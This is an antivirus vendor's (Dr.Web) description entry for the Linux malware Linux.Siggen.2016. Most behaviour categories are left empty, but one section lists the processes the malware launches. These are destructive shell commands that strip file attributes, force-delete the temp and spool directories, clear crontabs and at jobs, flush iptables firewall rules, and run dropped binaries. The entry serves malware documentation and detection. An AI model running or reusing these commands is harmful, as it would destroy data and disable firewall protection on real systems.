Linux.Siggen.2016

Linux.Siggen.2016

Added to the Dr.Web virus database: 2019-07-21

Virus description added: 2019-07-21

Malicious functions:

Launches itself as a daemon

Substitutes application name for:

Modifies firewall settings:

Launches processes:

sh -c chattr -R -i /tmp/* ; rm -rf /tmp/.* ; rm -rf /tmp/* ; crontab -r ; for i in `atq | awk '{print $1}'`; do atrm $i; done ; rm -rf /dev/shm/* ; rm -rf /dev/shm/* ; rm -rf /var/tmp/* ; rm -rf /var/tmp/.* ; chattr -R -i /var/spool/*/* ; rm -rf /var/spool/*/*/* ; mkdir /tmp ; >/dev/null 2>&1
chattr -R -i /tmp/*
rm -rf /tmp/. /tmp/.. /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix
rm -rf /tmp/*
crontab -r
atq
awk {print $1}
rm -rf /dev/shm/*
sh -c iptables -F ; iptables-save >/dev/null 2>&1
rm -rf /var/tmp/*
rm -rf /var/tmp/. /var/tmp/..
chattr -R -i /var/spool/cron/atjobs /var/spool/cron/atspool /var/spool/cron/crontabs /var/spool/exim4/db /var/spool/exim4/input /var/spool/exim4/msglog
sh -c /root/exesbr
/root/exesbr
rm -rf /var/spool/exim4/input/1ahTzp-0002FZ-0L-D /var/spool/exim4/input/1ahUKa-0002Fm-0o-D
mkdir /tmp
iptables-save
sh -c chattr -R -i /tmp/* ; rm -rf /tmp/.* ; rm -rf /tmp/* ; for i in `atq | awk '{print $1}'`; do atrm $i; done ; rm -rf /dev/shm/* ; rm -rf /dev/shm/* ; rm -rf /var/tmp/* ; rm -rf /var/tmp/.* ; chattr -R -i /var/spool/*/* ; rm -rf /var/spool/*/*/* ; >/dev/null 2>&1
rm -rf /tmp/. /tmp/..
sh -c /root/lomg lomg
/root/lomg lomg
sh -c /root/iilkqr xjwu
/root/iilkqr xjwu
sh -c /root/nskvsrpn
/root/nskvsrpn

Kills system processes:

Kills the following processes:

Performs operations with the file system:

Modifies file access rights:

Creates or modifies files:

Deletes files:

Network activity:

HTTP GET requests: